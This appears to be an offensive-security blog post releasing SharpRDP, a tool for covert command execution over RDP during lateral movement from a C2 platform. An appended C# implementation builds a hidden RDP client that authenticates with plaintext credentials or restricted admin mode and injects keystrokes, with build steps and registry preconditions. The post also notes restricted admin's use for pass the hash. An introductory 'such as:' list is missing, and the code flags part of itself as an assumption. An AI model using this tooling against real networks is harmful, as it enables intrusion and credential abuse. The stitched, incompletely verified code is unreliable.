It's no secret that attackers are looking for new techniques to execute lateral movement. However, only a handful of publicly known techniques are typically used. This post doesn't highlight a new lateral movement technique but instead offers a new way to leverage a known method from your favorite Command and Control (C2) platform. I'll show how to leverage the Remote Desktop Protocol (RDP) for non-graphical, authenticated remote command execution against a target.

When using RDP for lateral movement, an operator will typically start a SOCKS proxy, use an RDP application/client, execute a payload, and close out the session. Doing this has always felt like unnecessary overhead to perform one action. The idea of performing RDP lateral movement through an existing C2 channel, without a SOCKS proxy or a GUI RDP client, always seemed possible but wasn't really publicly talked about. While searching for existing work, I found several message boards and forums where people mentioned the idea and posted small code snippets, but I never found a fully weaponized version.

After compiling disparate information and bits of code and discussing the topic with coworkers, I had a starting point to work with.

Ultimately, I discovered that Windows has a library, mstscax.dll, that gives access to every possible RDP action and is used by virtually all RDP clients, including Remote Desktop Connection and Royal TSX. This DLL is an ActiveX COM library for Microsoft Terminal Services. By leveraging it, an operator can create a console application that performs authenticated remote command execution through RDP without the need for a GUI client or a SOCKS proxy. Today I'm releasing SharpRDP, a .NET console application that can be used to perform authenticated command execution against a remote target for the purposes of lateral movement. The terminal services library (mstscax.dll) exposes two forms that can be leveraged: the scriptable control, which can be used by a web client or by scripts, and the non-scriptable control, which is used from native or managed code.

SharpRDP relies on the non-scriptable control of the COM library. The ActiveX importer aximp.exe, which is part of the .NET SDK, is required to generate the appropriate wrapper DLLs, MSTSCLib.dll and AxMSTSCLib.dll, from mstscax.dll. MSTSCLib.dll contains the managed definitions for the library, while AxMSTSCLib.dll contains the Windows Forms control for the ActiveX classes. Both DLLs contain classes that are required to perform the actions needed for lateral movement.

[Figure 1 - SharpRDP execution through CobaltStrike]

Windows Forms are used during terminal services connection object instantiation, so we create a Windows Form object that is invisible to any user on the host we are executing from. From this form, we can call methods to perform the actions needed for all of the lateral movement steps, such as:

Each of these actions is registered as an event, with event handlers that determine the course of action to be taken. There are two ways to authenticate: by providing plaintext credentials (likely the most common and usable scenario), or by using the current user context with restricted admin mode. Restricted admin mode is a Windows protection mechanism that performs a network-type logon rather than an interactive one, to prevent credentials from being cached when RDPing to a host. This has commonly been abused for pass the hash over RDP.

Once authenticated, SharpRDP sends virtual keystrokes to the remote system via a method called SendKeys.
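The flow described above (an invisible form hosting the mstscax.dll control, the connection object, the event handlers, the two authentication modes, and SendKeys), as an added C# illustration that is not SharpRDP's own source. It assumes that MSTSCLib.dll and AxMSTSCLib.dll were generated with aximp.exe from mstscax.dll and are referenced by the project; the host name, domain, user name and password in Main are constructed placeholders, and the scan-code encoding in SendScanCodes is an assumption noted in the code.

```csharp
// Added illustration, not SharpRDP's source. Assumes MSTSCLib.dll and AxMSTSCLib.dll
// were generated with aximp.exe from mstscax.dll and are referenced by the project.
using System;
using System.ComponentModel;
using System.Windows.Forms;
using AxMSTSCLib;
using MSTSCLib;

public class HiddenRdpForm : Form
{
    private readonly AxMsRdpClient9NotSafeForScripting rdp = new AxMsRdpClient9NotSafeForScripting();

    public HiddenRdpForm(string server, string domain, string user, string password, bool restrictedAdmin)
    {
        // The ActiveX control must live on a form; keep that form invisible to anyone logged on locally.
        Opacity = 0;
        ShowInTaskbar = false;
        ((ISupportInitialize)rdp).BeginInit();
        Controls.Add(rdp);
        ((ISupportInitialize)rdp).EndInit();

        rdp.Server = server;
        rdp.Domain = domain;
        rdp.UserName = user;
        rdp.AdvancedSettings9.EnableCredSspSupport = true; // network level authentication

        if (restrictedAdmin)
        {
            // Current user context: request a restricted admin (network-type) logon and refuse
            // credential delegation, so no password is sent to or cached on the target.
            object enable = true;
            var ext = (IMsRdpExtendedSettings)rdp.GetOcx();
            ext.set_Property("RestrictedLogon", ref enable);
            ext.set_Property("DisableCredentialsDelegation", ref enable);
        }
        else
        {
            // Plaintext credentials: the most common case.
            rdp.AdvancedSettings9.ClearTextPassword = password;
        }

        // Everything after Connect() is driven by the control's events.
        rdp.OnLoginComplete += OnLoginComplete;
        rdp.OnDisconnected += OnDisconnected;
        Load += (s, e) => rdp.Connect();
    }

    private void OnLoginComplete(object sender, EventArgs e)
    {
        // The session is authenticated: send keystrokes. Press and release Enter (scan code 0x1C)
        // is the smallest possible sequence; a real payload would type a command here.
        SendScanCodes(new[] { 0x1C, 0x1C }, new[] { false, true });

        // Give the session time to process the input before tearing it down.
        var t = new Timer { Interval = 5000 };
        t.Tick += (s, a) => { t.Stop(); rdp.Disconnect(); };
        t.Start();
    }

    private void OnDisconnected(object sender, IMsTscAxEvents_OnDisconnectedEvent e)
    {
        Console.WriteLine("disconnected, reason code " + e.discReason);
        Close();
    }

    // Virtual keystrokes through IMsRdpClientNonScriptable::SendKeys. keyUp[i] is true for a release.
    // ASSUMPTION: plKeyData uses the WM_KEYDOWN lParam layout, scan code in bits 16-23.
    private void SendScanCodes(int[] scanCodes, bool[] keyUp)
    {
        var keyData = new int[scanCodes.Length];
        for (int i = 0; i < scanCodes.Length; i++)
            keyData[i] = scanCodes[i] << 16;
        var ns = (IMsRdpClientNonScriptable5)rdp.GetOcx();
        ns.SendKeys(keyData.Length, ref keyUp[0], ref keyData[0]);
    }

    [STAThread]
    public static void Main()
    {
        // Constructed placeholder arguments.
        Application.Run(new HiddenRdpForm("target.example", "EXAMPLE", "operator", "Passw0rd!", restrictedAdmin: false));
    }
}
```

Build this as a .NET Framework application referencing the two wrapper DLLs; running `aximp.exe C:\Windows\System32\mstscax.dll` from a Developer Command Prompt writes MSTSCLib.dll and AxMSTSCLib.dll to the current directory. The STAThread attribute and the message loop started by Application.Run are required for the ActiveX control to function at all. A restricted admin logon only succeeds if the target permits it (DisableRestrictedAdmin set to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); because it is a network-type logon, the credential is never sent to the target, which is why the mode can be driven from the current context or, as the post notes, abused for pass the hash.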